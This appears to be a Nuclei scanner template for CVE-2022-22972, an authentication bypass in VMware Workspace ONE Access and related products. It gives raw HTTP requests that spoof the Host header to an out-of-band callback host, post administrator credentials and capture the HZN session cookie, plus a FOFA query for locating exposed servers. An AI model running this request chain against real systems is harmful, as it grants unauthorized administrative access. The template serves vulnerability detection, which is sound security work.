id: CVE-2022-22972 info: name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass author: For3stCo1d,princechaddha severity: critical description: | VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. impact: | Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system. remediation: | Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972). reference: - https://github.com/horizon3ai/CVE-2022-22972 - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive - https://www.vmware.com/security/advisories/VMSA-2022-0014.html - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22972 cwe-id: CWE-287 epss-score: 0.7146 epss-percentile: 0.9778 cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: max-request: 3 vendor: vmware product: identity_manager fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" tags: cve2022,cve,vmware,auth-bypass,oast http: - raw: - | GET /vcac/ HTTP/1.1 Host: {{Hostname}} - | GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1 Host: {{Hostname}} - | POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1 Host: {{interactsh-url}} Content-type: application/x-www-form-urlencoded protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in host-redirects: true max-redirects: 3 matchers-condition: and matchers: - type: word part: header words: - "HZN=" - type: word part: interactsh_protocol words: - "http" - type: status status: - 302 extractors: - type: regex name: protected_state group: 1 regex: - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' internal: true part: body - type: regex name: horizonRelayState group: 1 regex: - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' internal: true part: body - type: regex name: userstore group: 1 regex: - 'id="userstore" value="([a-z.]+)" \/>' internal: true part: body - type: regex name: userstoreDisplay group: 1 regex: - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' internal: true part: body - type: regex name: stickyConnectorId group: 1 regex: - 'name="stickyConnectorId" value="(.*)"/>' internal: true part: body - type: kval name: HZN-Cookie kval: - 'HZN' part: header # digest: 4a0a0047304502206403cd0d279ad3059877b01e431f357ec5373c9854c2ff5cbe853a8ac65ef39c022100d9069fe039d74cbcad2eb0f8ef4724af0436462068f8baecdb321328ac7a89af:922c64590222798bb761d5b6d8e72950